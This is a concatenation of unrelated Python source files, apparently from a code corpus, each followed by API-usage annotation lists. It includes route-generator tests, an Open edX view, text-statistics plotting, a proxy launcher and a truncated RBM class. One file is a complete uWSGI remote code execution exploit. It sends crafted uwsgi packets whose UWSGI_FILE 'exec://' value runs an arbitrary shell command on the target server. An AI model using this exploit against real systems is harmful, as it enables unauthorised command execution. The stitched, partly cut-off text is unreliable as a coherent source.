'cv2.blur', 'cv2.blur', (['img'], {'ksize': '(5, 5)'}), '(img, ksize=(5, 5))\n', (598, 617), False, 'import cv2\n'), ((970, 1019), 'torchvision.transforms.Resize', 'transforms.Resize', (['(new_h, new_w)'], {'antialias': '(True)'}), '((new_h, new_w), antialias=True)\n', (987, 1019), False, 'from torchvision import transforms\n'), ((2767, 2819), 'torchvision.transforms.Resize', 'transforms.Resize', (['target.shape[-2:]'], {'antialias': '(True)'}), '(target.shape[-2:], antialias=True)\n', (2784, 2819), False, 'from torchvision import transforms\n'), ((1214, 1263), 'torchvision.transforms.Resize', 'transforms.Resize', (['img.shape[-2:]'], {'antialias': '(True)'}), '(img.shape[-2:], antialias=True)\n', (1231, 1263), False, 'from torchvision import transforms\n'), ((1672, 1730), 'torchvision.transforms.Resize', 'transforms.Resize', (['(min_height, new_width)'], {'antialias': '(True)'}), '((min_height, new_width), antialias=True)\n', (1689, 1730), False, 'from torchvision import transforms\n')] |
import random
import shapely.geometry as sg
from locintel.quality.generators.random import RandomRoutePlanGenerator, polygons
random.seed(10)
class TestRandomRoutePlanGenerator(object):
def test_random_route_plan_generator(self):
polygon = polygons["berlin"]
generator = RandomRoutePlanGenerator()
route_plan = generator.generate_route(polygon)
assert polygon.contains(sg.Point(route_plan.start.lng, route_plan.start.lat))
assert polygon.contains(sg.Point(route_plan.end.lng, route_plan.end.lat))
assert generator.name == "random"
def test_random_route_plan_generator_accepts_identifier(self):
polygon = polygons["berlin"]
generator = RandomRoutePlanGenerator()
identifier = "id1"
route_plan = generator.generate_route(polygon, identifier=identifier)
assert polygon.contains(sg.Point(route_plan.start.lng, route_plan.start.lat))
assert polygon.contains(sg.Point(route_plan.end.lng, route_plan.end.lat))
assert route_plan.identifier == identifier
assert generator.name == "random"
| [
"locintel.quality.generators.random.RandomRoutePlanGenerator",
"random.seed",
"shapely.geometry.Point"
] | [((128, 143), 'random.seed', 'random.seed', (['(10)'], {}), '(10)\n', (139, 143), False, 'import random\n'), ((295, 321), 'locintel.quality.generators.random.RandomRoutePlanGenerator', 'RandomRoutePlanGenerator', ([], {}), '()\n', (319, 321), False, 'from locintel.quality.generators.random import RandomRoutePlanGenerator, polygons\n'), ((714, 740), 'locintel.quality.generators.random.RandomRoutePlanGenerator', 'RandomRoutePlanGenerator', ([], {}), '()\n', (738, 740), False, 'from locintel.quality.generators.random import RandomRoutePlanGenerator, polygons\n'), ((411, 463), 'shapely.geometry.Point', 'sg.Point', (['route_plan.start.lng', 'route_plan.start.lat'], {}), '(route_plan.start.lng, route_plan.start.lat)\n', (419, 463), True, 'import shapely.geometry as sg\n'), ((497, 545), 'shapely.geometry.Point', 'sg.Point', (['route_plan.end.lng', 'route_plan.end.lat'], {}), '(route_plan.end.lng, route_plan.end.lat)\n', (505, 545), True, 'import shapely.geometry as sg\n'), ((880, 932), 'shapely.geometry.Point', 'sg.Point', (['route_plan.start.lng', 'route_plan.start.lat'], {}), '(route_plan.start.lng, route_plan.start.lat)\n', (888, 932), True, 'import shapely.geometry as sg\n'), ((966, 1014), 'shapely.geometry.Point', 'sg.Point', (['route_plan.end.lng', 'route_plan.end.lat'], {}), '(route_plan.end.lng, route_plan.end.lat)\n', (974, 1014), True, 'import shapely.geometry as sg\n')] |
#!/usr/bin/python
# coding: utf-8
######################
# Uwsgi RCE Exploit
######################
# Author: <EMAIL>
# Created: 2017-7-18
# Last modified: 2018-1-30
# Note: Just for research purpose
import sys
import socket
import argparse
import requests
def sz(x):
s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')
s = bytes.fromhex(s) if sys.version_info[0] == 3 else s.decode('hex')
return s[::-1]
def pack_uwsgi_vars(var):
pk = b''
for k, v in var.items() if hasattr(var, 'items') else var:
pk += sz(k) + k.encode('utf8') + sz(v) + v.encode('utf8')
result = b'\x00' + sz(pk) + b'\x00' + pk
return result
def parse_addr(addr, default_port=None):
port = default_port
if isinstance(addr, str):
if addr.isdigit():
addr, port = '', addr
elif ':' in addr:
addr, _, port = addr.partition(':')
elif isinstance(addr, (list, tuple, set)):
addr, port = addr
port = int(port) if port else port
return (addr or '127.0.0.1', port)
def get_host_from_url(url):
if '//' in url:
url = url.split('//', 1)[1]
host, _, url = url.partition('/')
return (host, '/' + url)
def fetch_data(uri, payload=None, body=None):
if 'http' not in uri:
uri = 'http://' + uri
s = requests.Session()
# s.headers['UWSGI_FILE'] = payload
if body:
import urlparse
body_d = dict(urlparse.parse_qsl(urlparse.urlsplit(body).path))
d = s.post(uri, data=body_d)
else:
d = s.get(uri)
return {
'code': d.status_code,
'text': d.text,
'header': d.headers
}
def ask_uwsgi(addr_and_port, mode, var, body=''):
if mode == 'tcp':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(parse_addr(addr_and_port))
elif mode == 'unix':
s = socket.socket(socket.AF_UNIX)
s.connect(addr_and_port)
s.send(pack_uwsgi_vars(var) + body.encode('utf8'))
response = []
# Actually we dont need the response, it will block if we run any commands.
# So I comment all the receiving stuff.
# while 1:
# data = s.recv(4096)
# if not data:
# break
# response.append(data)
s.close()
return b''.join(response).decode('utf8')
def curl(mode, addr_and_port, payload, target_url):
host, uri = get_host_from_url(target_url)
path, _, qs = uri.partition('?')
if mode == 'http':
return fetch_data(addr_and_port+uri, payload)
elif mode == 'tcp':
host = host or parse_addr(addr_and_port)[0]
else:
host = addr_and_port
var = {
'SERVER_PROTOCOL': 'HTTP/1.1',
'REQUEST_METHOD': 'GET',
'PATH_INFO': path,
'REQUEST_URI': uri,
'QUERY_STRING': qs,
'SERVER_NAME': host,
'HTTP_HOST': host,
'UWSGI_FILE': payload,
'SCRIPT_NAME': target_url
}
return ask_uwsgi(addr_and_port, mode, var)
def main(*args):
desc = """
This is a uwsgi client & RCE exploit.
Last modifid at 2018-01-30 by <EMAIL>
"""
elog = "Example:uwsgi_exp.py -u 192.168.3.11:5000 -c \"echo 111>/tmp/abc\""
parser = argparse.ArgumentParser(description=desc, epilog=elog)
parser.add_argument('-m', '--mode', nargs='?', default='tcp',
help='Uwsgi mode: 1. http 2. tcp 3. unix. The default is tcp.',
dest='mode', choices=['http', 'tcp', 'unix'])
parser.add_argument('-u', '--uwsgi', nargs='?', required=True,
help='Uwsgi server: 192.168.3.11:5000 or /tmp/uwsgi.sock',
dest='uwsgi_addr')
parser.add_argument('-c', '--command', nargs='?', required=True,
help='Command: The exploit command you want to execute, must have this.',
dest='command')
if len(sys.argv) < 2:
parser.print_help()
return
args = parser.parse_args()
if args.mode.lower() == "http":
print("[-]Currently only tcp/unix method is supported in RCE exploit.")
return
payload = 'exec://' + args.command + "; echo test" # must have someting in output or the uWSGI crashs.
print("[*]Sending payload.")
print(curl(args.mode.lower(), args.uwsgi_addr, payload, '/testapp'))
if __name__ == '__main__':
main() | [
"urlparse.urlsplit",
"socket.socket",
"requests.Session",
"argparse.ArgumentParser"
] | [((1311, 1329), 'requests.Session', 'requests.Session', ([], {}), '()\n', (1327, 1329), False, 'import requests\n'), ((3204, 3258), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'desc', 'epilog': 'elog'}), '(description=desc, epilog=elog)\n', (3227, 3258), False, 'import argparse\n'), ((1738, 1787), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (1751, 1787), False, 'import socket\n'), ((1870, 1899), 'socket.socket', 'socket.socket', (['socket.AF_UNIX'], {}), '(socket.AF_UNIX)\n', (1883, 1899), False, 'import socket\n'), ((1448, 1471), 'urlparse.urlsplit', 'urlparse.urlsplit', (['body'], {}), '(body)\n', (1465, 1471), False, 'import urlparse\n')] |
"""
Views file for the Darklang Django App
"""
from django.contrib.auth.decorators import login_required
from django.http import Http404
from django.shortcuts import redirect
from django.template.loader import render_to_string
from django.utils.decorators import method_decorator
from django.utils.translation import LANGUAGE_SESSION_KEY
from django.utils.translation import ugettext as _
from web_fragments.fragment import Fragment
from openedx.core.djangoapps.dark_lang import DARK_LANGUAGE_KEY
from openedx.core.djangoapps.dark_lang.models import DarkLangConfig
from openedx.core.djangoapps.plugin_api.views import EdxFragmentView
from openedx.core.djangoapps.user_api.preferences.api import delete_user_preference, set_user_preference
from openedx.core.djangoapps.util.user_messages import PageLevelMessages
LANGUAGE_INPUT_FIELD = 'preview_language'
class PreviewLanguageFragmentView(EdxFragmentView):
"""
View used when a user is attempting to change the preview language using Darklang.
Expected Behavior:
GET - returns a form for setting/resetting the user's dark language
POST - updates or clears the setting to the given dark language
"""
def render_to_fragment(self, request, course_id=None, **kwargs): # lint-amnesty, pylint: disable=arguments-differ, unused-argument
"""
Renders the language preview view as a fragment.
"""
html = render_to_string('dark_lang/preview-language-fragment.html', {})
return Fragment(html)
def create_base_standalone_context(self, request, fragment, **kwargs):
"""
Creates the base context for rendering a fragment as a standalone page.
"""
return {
'uses_bootstrap': True,
}
def standalone_page_title(self, request, fragment, **kwargs):
"""
Returns the page title for the standalone update page.
"""
return _('Preview Language Administration')
@method_decorator(login_required)
def get(self, request, *args, **kwargs):
"""
Renders the fragment to control the preview language.
"""
if not self._user_can_preview_languages(request.user):
raise Http404
return super().get(request, *args, **kwargs)
@method_decorator(login_required)
def post(self, request, **kwargs): # lint-amnesty, pylint: disable=unused-argument
"""
Accept requests to update the preview language.
"""
if not self._user_can_preview_languages(request.user):
raise Http404
action = request.POST.get('action', None)
if action == 'set_preview_language':
self._set_preview_language(request)
elif action == 'reset_preview_language':
self._clear_preview_language(request)
return redirect(request.path)
def _user_can_preview_languages(self, user):
"""
Returns true if the specified user can preview languages.
"""
if not DarkLangConfig.current().enabled:
return False
return user and not user.is_anonymous
def _set_preview_language(self, request):
"""
Sets the preview language for the current user.
"""
preview_language = request.POST.get(LANGUAGE_INPUT_FIELD, '')
if not preview_language.strip():
PageLevelMessages.register_error_message(request, _('Language not provided'))
return
set_user_preference(request.user, DARK_LANGUAGE_KEY, preview_language)
PageLevelMessages.register_success_message(
request,
_('Language set to {preview_language}').format(
preview_language=preview_language
)
)
def _clear_preview_language(self, request):
"""
Clears the preview language for the current user.
"""
delete_user_preference(request.user, DARK_LANGUAGE_KEY)
if LANGUAGE_SESSION_KEY in request.session:
del request.session[LANGUAGE_SESSION_KEY]
PageLevelMessages.register_success_message(
request,
_('Language reset to the default')
)
| [
"web_fragments.fragment.Fragment",
"openedx.core.djangoapps.dark_lang.models.DarkLangConfig.current",
"openedx.core.djangoapps.user_api.preferences.api.set_user_preference",
"django.utils.decorators.method_decorator",
"openedx.core.djangoapps.user_api.preferences.api.delete_user_preference",
"django.short... | [((1962, 1994), 'django.utils.decorators.method_decorator', 'method_decorator', (['login_required'], {}), '(login_required)\n', (1978, 1994), False, 'from django.utils.decorators import method_decorator\n'), ((2274, 2306), 'django.utils.decorators.method_decorator', 'method_decorator', (['login_required'], {}), '(login_required)\n', (2290, 2306), False, 'from django.utils.decorators import method_decorator\n'), ((1412, 1476), 'django.template.loader.render_to_string', 'render_to_string', (['"""dark_lang/preview-language-fragment.html"""', '{}'], {}), "('dark_lang/preview-language-fragment.html', {})\n", (1428, 1476), False, 'from django.template.loader import render_to_string\n'), ((1492, 1506), 'web_fragments.fragment.Fragment', 'Fragment', (['html'], {}), '(html)\n', (1500, 1506), False, 'from web_fragments.fragment import Fragment\n'), ((1919, 1955), 'django.utils.translation.ugettext', '_', (['"""Preview Language Administration"""'], {}), "('Preview Language Administration')\n", (1920, 1955), True, 'from django.utils.translation import ugettext as _\n'), ((2821, 2843), 'django.shortcuts.redirect', 'redirect', (['request.path'], {}), '(request.path)\n', (2829, 2843), False, 'from django.shortcuts import redirect\n'), ((3460, 3530), 'openedx.core.djangoapps.user_api.preferences.api.set_user_preference', 'set_user_preference', (['request.user', 'DARK_LANGUAGE_KEY', 'preview_language'], {}), '(request.user, DARK_LANGUAGE_KEY, preview_language)\n', (3479, 3530), False, 'from openedx.core.djangoapps.user_api.preferences.api import delete_user_preference, set_user_preference\n'), ((3877, 3932), 'openedx.core.djangoapps.user_api.preferences.api.delete_user_preference', 'delete_user_preference', (['request.user', 'DARK_LANGUAGE_KEY'], {}), '(request.user, DARK_LANGUAGE_KEY)\n', (3899, 3932), False, 'from openedx.core.djangoapps.user_api.preferences.api import delete_user_preference, set_user_preference\n'), ((4124, 4158), 'django.utils.translation.ugettext', '_', (['"""Language reset to the default"""'], {}), "('Language reset to the default')\n", (4125, 4158), True, 'from django.utils.translation import ugettext as _\n'), ((2999, 3023), 'openedx.core.djangoapps.dark_lang.models.DarkLangConfig.current', 'DarkLangConfig.current', ([], {}), '()\n', (3021, 3023), False, 'from openedx.core.djangoapps.dark_lang.models import DarkLangConfig\n'), ((3404, 3430), 'django.utils.translation.ugettext', '_', (['"""Language not provided"""'], {}), "('Language not provided')\n", (3405, 3430), True, 'from django.utils.translation import ugettext as _\n'), ((3616, 3655), 'django.utils.translation.ugettext', '_', (['"""Language set to {preview_language}"""'], {}), "('Language set to {preview_language}')\n", (3617, 3655), True, 'from django.utils.translation import ugettext as _\n')] |
# !/usr/bin/python
# -*- coding: utf-8 -*-
# @time : 2020/5/27 21:18
# @author : Mo
# @function: 统计
from text_analysis.utils.text_common import txt_read, txt_write, load_json, save_json, get_all_dirs_files
from text_analysis.conf.path_log import logger
from collections import Counter
from typing import List, Dict
import json
import os
import matplotlib.ticker as ticker
import matplotlib.pyplot as plt
from pylab import mpl
def counter_length_label(path_file, dir_save, show: str="bar"):
"""
统计文本长度-类别数
:param path_file: str
:param path_save: str
:return:
"""
files = get_all_dirs_files(path_file)
files = [file for file in files if file.endswith(".json")]
tc_data_dev = []
for f in files:
tc_data_dev += txt_read(f)
# 文本长度与类别数
lengths_question = []
label_total = []
for tdd in tc_data_dev:
tdd_json = json.loads(tdd)
question = tdd_json.get("text", "")
label = tdd_json.get("label")
lengths_question.append(len(question))
if type(label) == list:
label_total += label
else:
label_total.append(label)
# 统计
lengths_dict = dict(Counter(lengths_question))
label_dict = dict(Counter(label_total))
# 排序
lengths_dict_sort = sorted(lengths_dict.items(), key=lambda x: x[0], reverse=False)
label_dict_sort = sorted(label_dict.items(), key=lambda x: x[1], reverse=True)
logger.info("length of text is {}".format(lengths_dict_sort))
logger.info("freq of label is {}".format(label_dict_sort))
# 长度覆盖
lengths_question.sort()
len_ques = len(lengths_question)
len_99 = lengths_question[int(0.99 * len_ques)]
len_98 = lengths_question[int(0.98 * len_ques)]
len_95 = lengths_question[int(0.95 * len_ques)]
len_90 = lengths_question[int(0.90 * len_ques)]
logger.info("99% length of text is {}".format(len_99))
logger.info("98% length of text is {}".format(len_98))
logger.info("95% length of text is {}".format(len_95))
logger.info("90% length of text is {}".format(len_90))
length_dict = {"len_99": len_99,
"len_98": len_98,
"len_95": len_95,
"len_90": len_90
}
# 文本长度length/字典
save_json(length_dict, os.path.join(dir_save, "length.json"))
# 文本长度length/展示
draw_picture(lengths_dict_sort, os.path.join(dir_save, "length.png"), show="plot")
# 类别数label/展示
draw_picture(label_dict_sort, os.path.join(dir_save, "label.png"), show)
# 箱型图length/展示
draw_box([lengths_question], os.path.join(dir_save, "{}_boxplot.png".format("length")))
def show_chinese(xs: List, ys: List, file: str=None, show: str="bar"):
"""
画折线图,支持中文
:param xs: list
:param ys: list
:param dir: str
:return: draw picture
"""
mpl.rcParams["font.sans-serif"] = ["SimHei"]
xis = [i for i in range(len(xs))]
if len(ys) >= 32:
plt.xscale('symlog')
plt.yscale('symlog')
plt.subplots_adjust(bottom=0.2)
# plt.figure(dpi=64)
# elif len(ys) >= 128:
# plt.xscale('log')
# plt.yscale('log')
# plt.yticks(xis, ys, size='small', fontsize=13)
if show=="plot": # 绘制折线图
# fig, ax = plt.subplots(1, 1)
# ax.xaxis.set_major_locator(ticker.MultipleLocator(64))
# plt.figure(dpi=256)
# from matplotlib.font_manager import FontProperties
# font = FontProperties(fname="C:\Windows\Fonts\simkai.ttf", size=16)
# fontproperites = font
# fontdict={"fontname":"C:\Windows\Fonts\simkai.ttf"}
# plt.xlabel(xs, fontproperites = font)
plt.xticks(xis, ys, size='small', rotation=64, fontsize=13)
plt.plot(xis, xs, 'o-', label=u"线条") # 画图
elif show=="pie": # 绘制扇形图
# plt.figure(dpi=256)
plt.xticks(xis, xs, size='small', rotation=64, fontsize=13)
plt.pie(xs, labels=ys, autopct='%1.1f%%', shadow=False, startangle=150)
else: # 绘制并列柱状图
# 创建画布
# fig, ax = plt.subplots(1, 1)
# ax.xaxis.set_major_locator(ticker.MultipleLocator(max(int(len(xs)/16), 128)))
# plt.figure(dpi=128)
# plt.figure(dpi=256)
plt.xticks(xis, ys, size='small', rotation=64, fontsize=13)
plt.bar(xis, xs, 0.8)
# plt.figure(figsize=(min(512, len(xs)), min(256, int(len(xs)/2))), dpi=32)
# plt.figure(dpi=128)
# plt.yticks(xis, ys, size='small', fontsize=13)
# plt.barh(xis, xs, 0.8)
if file: # 保存图片, save要在plt之前才行
plt.savefig(file)
else: # 没有指定则默认一个
plt.savefig("fig.png")
# plt.show()
plt.close()
def draw_picture(xy_list_tuple, path, show: str="bar"):
"""
文本长度-类别(展示-保存)
:param xy_list_tuple: List[tuple]
:param path: str
:return:
"""
length_x = []
length_y = []
for k, v in xy_list_tuple:
length_x.append(k)
length_y.append(v)
show_chinese(length_y, length_x, path, show)
def draw_box(boxs: List, file: str=None):
"""
箱线图、箱型图 boxplot()
:param boxs: list
:param file: str
:return:
"""
mpl.rcParams["font.sans-serif"] = ["SimHei"] # 中文
plt.figure(figsize=(10, 5)) # 设置画布的尺寸
plt.title("boxplot-length", fontsize=20) # 标题,并设定字号大小
# notch:是否是凹口的形式展现箱线图;sym:异常点的形状;
plt.boxplot(boxs, notch=True, sym="*", vert=False, showmeans=True, patch_artist=True)
# boxprops={'color':'orangered', 'facecolor':'gray'}) # 颜色
if file: # 保存图片, save要在plt之前才行
plt.savefig(file)
else: # 没有指定则默认一个
plt.savefig("boxplot.png")
# plt.show() # 显示图像
plt.close()
if __name__ == '__main__':
path_in_dir = "../data/corpus/classify"
path_save_dir = "../data/corpus/classify/分析结果"
if path_save_dir is None:
path_save_dir = os.path.join(os.path.dirname(path_in_dir), "分析结果")
if path_save_dir:
if not os.path.exists(path_save_dir):
os.mkdir(path_save_dir)
counter_length_label(path_in_dir, path_save_dir, show="bar")
# show_x = [i for i in range(32)]
# show_y = [str("你是谁") for i in range(32)]
# show_chinese(show_x, show_y, file="xy1.png")
# show_chinese(show_x, show_y, file="xy2.png", show="pie")
# show_chinese(show_x, show_y, file="xy3.png", show="plot")
| [
"matplotlib.pyplot.boxplot",
"text_analysis.utils.text_common.get_all_dirs_files",
"os.path.exists",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.close",
"os.mkdir",
"matplotlib.pyplot.yscale",
"json.loads",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.xticks",
"os.path.dirname",
"matplotli... | [((608, 637), 'text_analysis.utils.text_common.get_all_dirs_files', 'get_all_dirs_files', (['path_file'], {}), '(path_file)\n', (626, 637), False, 'from text_analysis.utils.text_common import txt_read, txt_write, load_json, save_json, get_all_dirs_files\n'), ((3009, 3040), 'matplotlib.pyplot.subplots_adjust', 'plt.subplots_adjust', ([], {'bottom': '(0.2)'}), '(bottom=0.2)\n', (3028, 3040), True, 'import matplotlib.pyplot as plt\n'), ((4642, 4653), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (4651, 4653), True, 'import matplotlib.pyplot as plt\n'), ((5193, 5220), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 5)'}), '(figsize=(10, 5))\n', (5203, 5220), True, 'import matplotlib.pyplot as plt\n'), ((5236, 5276), 'matplotlib.pyplot.title', 'plt.title', (['"""boxplot-length"""'], {'fontsize': '(20)'}), "('boxplot-length', fontsize=20)\n", (5245, 5276), True, 'import matplotlib.pyplot as plt\n'), ((5333, 5422), 'matplotlib.pyplot.boxplot', 'plt.boxplot', (['boxs'], {'notch': '(True)', 'sym': '"""*"""', 'vert': '(False)', 'showmeans': '(True)', 'patch_artist': '(True)'}), "(boxs, notch=True, sym='*', vert=False, showmeans=True,\n patch_artist=True)\n", (5344, 5422), True, 'import matplotlib.pyplot as plt\n'), ((5647, 5658), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (5656, 5658), True, 'import matplotlib.pyplot as plt\n'), ((765, 776), 'text_analysis.utils.text_common.txt_read', 'txt_read', (['f'], {}), '(f)\n', (773, 776), False, 'from text_analysis.utils.text_common import txt_read, txt_write, load_json, save_json, get_all_dirs_files\n'), ((886, 901), 'json.loads', 'json.loads', (['tdd'], {}), '(tdd)\n', (896, 901), False, 'import json\n'), ((1181, 1206), 'collections.Counter', 'Counter', (['lengths_question'], {}), '(lengths_question)\n', (1188, 1206), False, 'from collections import Counter\n'), ((1230, 1250), 'collections.Counter', 'Counter', (['label_total'], {}), '(label_total)\n', (1237, 1250), False, 'from collections import Counter\n'), ((2296, 2333), 'os.path.join', 'os.path.join', (['dir_save', '"""length.json"""'], {}), "(dir_save, 'length.json')\n", (2308, 2333), False, 'import os\n'), ((2391, 2427), 'os.path.join', 'os.path.join', (['dir_save', '"""length.png"""'], {}), "(dir_save, 'length.png')\n", (2403, 2427), False, 'import os\n'), ((2494, 2529), 'os.path.join', 'os.path.join', (['dir_save', '"""label.png"""'], {}), "(dir_save, 'label.png')\n", (2506, 2529), False, 'import os\n'), ((2955, 2975), 'matplotlib.pyplot.xscale', 'plt.xscale', (['"""symlog"""'], {}), "('symlog')\n", (2965, 2975), True, 'import matplotlib.pyplot as plt\n'), ((2984, 3004), 'matplotlib.pyplot.yscale', 'plt.yscale', (['"""symlog"""'], {}), "('symlog')\n", (2994, 3004), True, 'import matplotlib.pyplot as plt\n'), ((3658, 3717), 'matplotlib.pyplot.xticks', 'plt.xticks', (['xis', 'ys'], {'size': '"""small"""', 'rotation': '(64)', 'fontsize': '(13)'}), "(xis, ys, size='small', rotation=64, fontsize=13)\n", (3668, 3717), True, 'import matplotlib.pyplot as plt\n'), ((3726, 3762), 'matplotlib.pyplot.plot', 'plt.plot', (['xis', 'xs', '"""o-"""'], {'label': 'u"""线条"""'}), "(xis, xs, 'o-', label=u'线条')\n", (3734, 3762), True, 'import matplotlib.pyplot as plt\n'), ((4546, 4563), 'matplotlib.pyplot.savefig', 'plt.savefig', (['file'], {}), '(file)\n', (4557, 4563), True, 'import matplotlib.pyplot as plt\n'), ((4598, 4620), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""fig.png"""'], {}), "('fig.png')\n", (4609, 4620), True, 'import matplotlib.pyplot as plt\n'), ((5539, 5556), 'matplotlib.pyplot.savefig', 'plt.savefig', (['file'], {}), '(file)\n', (5550, 5556), True, 'import matplotlib.pyplot as plt\n'), ((5591, 5617), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""boxplot.png"""'], {}), "('boxplot.png')\n", (5602, 5617), True, 'import matplotlib.pyplot as plt\n'), ((3837, 3896), 'matplotlib.pyplot.xticks', 'plt.xticks', (['xis', 'xs'], {'size': '"""small"""', 'rotation': '(64)', 'fontsize': '(13)'}), "(xis, xs, size='small', rotation=64, fontsize=13)\n", (3847, 3896), True, 'import matplotlib.pyplot as plt\n'), ((3905, 3976), 'matplotlib.pyplot.pie', 'plt.pie', (['xs'], {'labels': 'ys', 'autopct': '"""%1.1f%%"""', 'shadow': '(False)', 'startangle': '(150)'}), "(xs, labels=ys, autopct='%1.1f%%', shadow=False, startangle=150)\n", (3912, 3976), True, 'import matplotlib.pyplot as plt\n'), ((4208, 4267), 'matplotlib.pyplot.xticks', 'plt.xticks', (['xis', 'ys'], {'size': '"""small"""', 'rotation': '(64)', 'fontsize': '(13)'}), "(xis, ys, size='small', rotation=64, fontsize=13)\n", (4218, 4267), True, 'import matplotlib.pyplot as plt\n'), ((4276, 4297), 'matplotlib.pyplot.bar', 'plt.bar', (['xis', 'xs', '(0.8)'], {}), '(xis, xs, 0.8)\n', (4283, 4297), True, 'import matplotlib.pyplot as plt\n'), ((5853, 5881), 'os.path.dirname', 'os.path.dirname', (['path_in_dir'], {}), '(path_in_dir)\n', (5868, 5881), False, 'import os\n'), ((5928, 5957), 'os.path.exists', 'os.path.exists', (['path_save_dir'], {}), '(path_save_dir)\n', (5942, 5957), False, 'import os\n'), ((5971, 5994), 'os.mkdir', 'os.mkdir', (['path_save_dir'], {}), '(path_save_dir)\n', (5979, 5994), False, 'import os\n')] |
#coding:utf-8
"""
@author : linkin
@email : <EMAIL>
@date : 2018-10-04
"""
import logging
from APIserver.apiserver import app
from components.collector import Collector
from components.validator import Validator
from components.detector import Detector
from components.scanner import Scaner
from components.tentacle import Tentacle
from multiprocessing import Pool
from multiprocessing import Manager
from config.config import MODE
from const.settings import RUN_FUNC
logger = logging.getLogger()
class Workstation(object):
"""
整个项目的启动工作面板
"""
def __init__(self):
self.collector = Collector()
self.validator = Validator()
self.detector = Detector()
self.scanner = Scaner()
self.tentacle = Tentacle()
self.proxyList = Manager().list()
def run_validator(self,proxyList):
self.validator.run(proxyList)
def run_collector(self,proxyList):
self.collector.run(proxyList)
def run_detector(self,*params):
self.detector.run()
def run_scanner(self,*params):
self.scanner.run()
def run_tentacle(self,*params):
self.tentacle.run()
def work(self):
"""
项目启动,根据config中的MODE配置执行对应的部件
这样可以隔离部件功能,耦合性较低。异步多进程执行需要
共享变量,使用了multiprocessing的Manager来生成
共享List.
"""
pool = Pool(5)
func = []
for i in MODE:
if MODE[i]:
func.append(eval('self.'+RUN_FUNC[i]))
[pool.apply_async(fun,args=(self.proxyList,)) for fun in func]
pool.close()
app.run(host='0.0.0.0',port=2020)
| [
"logging.getLogger",
"components.validator.Validator",
"components.tentacle.Tentacle",
"components.scanner.Scaner",
"APIserver.apiserver.app.run",
"multiprocessing.Pool",
"multiprocessing.Manager",
"components.collector.Collector",
"components.detector.Detector"
] | [((546, 565), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (563, 565), False, 'import logging\n'), ((675, 686), 'components.collector.Collector', 'Collector', ([], {}), '()\n', (684, 686), False, 'from components.collector import Collector\n'), ((712, 723), 'components.validator.Validator', 'Validator', ([], {}), '()\n', (721, 723), False, 'from components.validator import Validator\n'), ((749, 759), 'components.detector.Detector', 'Detector', ([], {}), '()\n', (757, 759), False, 'from components.detector import Detector\n'), ((785, 793), 'components.scanner.Scaner', 'Scaner', ([], {}), '()\n', (791, 793), False, 'from components.scanner import Scaner\n'), ((819, 829), 'components.tentacle.Tentacle', 'Tentacle', ([], {}), '()\n', (827, 829), False, 'from components.tentacle import Tentacle\n'), ((1412, 1419), 'multiprocessing.Pool', 'Pool', (['(5)'], {}), '(5)\n', (1416, 1419), False, 'from multiprocessing import Pool\n'), ((1640, 1674), 'APIserver.apiserver.app.run', 'app.run', ([], {'host': '"""0.0.0.0"""', 'port': '(2020)'}), "(host='0.0.0.0', port=2020)\n", (1647, 1674), False, 'from APIserver.apiserver import app\n'), ((855, 864), 'multiprocessing.Manager', 'Manager', ([], {}), '()\n', (862, 864), False, 'from multiprocessing import Manager\n')] |
import abc
import logging
from enum import Enum
from tqdm import tqdm
from ml import np
from ml.functions import sigmoid, dot_batch, bernoulli_from_probas
_log = logging.getLogger("ml")
class UnitType(Enum):
GAUSSIAN = 1
BERNOULLI = 2
class RBMSampler(object):
"""Sampler used in training of RBMs for estimating the gradient.
"""
def __init__(self, args):
super(RBMSampler, self).__init__()
self.args = args
class RBM:
"""
Restricted Boltzmann Machine with either Bernoulli or Gaussian
visible/hidden units.
Attributes
---------
num_visible: int
Number of visible units.
num_hidden: int
Number of hidden units.
visible_type: UnitType or str, default='bernoulli'
Type of random variable the visible units are assumed to be.
hidden_type: UnitType or str, default='bernoulli'
Type of random variable the hidden units are assumed to be.
estimate_visible_sigma: bool, default=False
Whether or not to estimate the variance of the visible units.
If :attr:`visible_type` is non-Gaussian, then this has no effect.
estimate_hidden_sigma: bool, default=False
Whether or not to estimate the variance of the hidden units.
If :attr:`hidden_type` is non-Gaussian, then this has no effect.
sampler_method: str, default='cd'
Specifies the method used in the sampling process when approximating
the gradient.
Available methods are:
- Contrastive Divergence (CD)
- Persistent Contrastive Divergence (PCD)
- Parallel Tempering (PT)
See :func:`RBM.grad` for more information about the
effects of the different available methods.
variables: list[array-like]
Holds the learnable parameters of the machine. This is used by
:func:`RBM.step` to deduce what parameters to update.
See Also
--------
:func:`RBM.grad` for more information about samplers.
"""
def __init__(self, num_visible, num_hidden,
visible_type='bernoulli', hidden_type='bernoulli',
estimate_visible_sigma=False, estimate_hidden_sigma=False,
sampler_method='cd'):
super(RBM, self).__init__()
self._warned_acceptance = 0
self.num_visible = num_visible
self.num_hidden = num_hidden
if sampler_method.lower() not in {'cd', 'pcd', 'pt'}:
raise ValueError(f"{sampler_method} is not supported")
self.sampler_method = sampler_method.lower()
# used by `PCD` sampler
self._prev = None
if isinstance(visible_type, str):
self.visible_type = getattr(UnitType, visible_type.upper())
else:
self.visible_type = visible_type
if isinstance(hidden_type, str):
self.hidden_type = getattr(UnitType, hidden_type.upper())
else:
self.hidden_type = hidden_type
self.estimate_visible_sigma = estimate_visible_sigma
self.estimate_hidden_sigma = estimate_hidden_sigma
self.v_bias, self.h_bias, self.v_sigma, self.h_sigma, self.W = self.initialize(
num_visible,
num_hidden
)
self._variables = [self.v_bias, self.h_bias, self.W]
if self.estimate_visible_sigma:
self._variables.append(self.v_sigma)
if self.estimate_hidden_sigma:
self._variables.append(self.h_sigma)
@property
def variables(self):
return self._variables
@staticmethod
def initialize(num_visible, num_hidden):
# biases for visible and hidden, respectively
v_bias = np.zeros(num_visible)
h_bias = np.zeros(num_hidden)
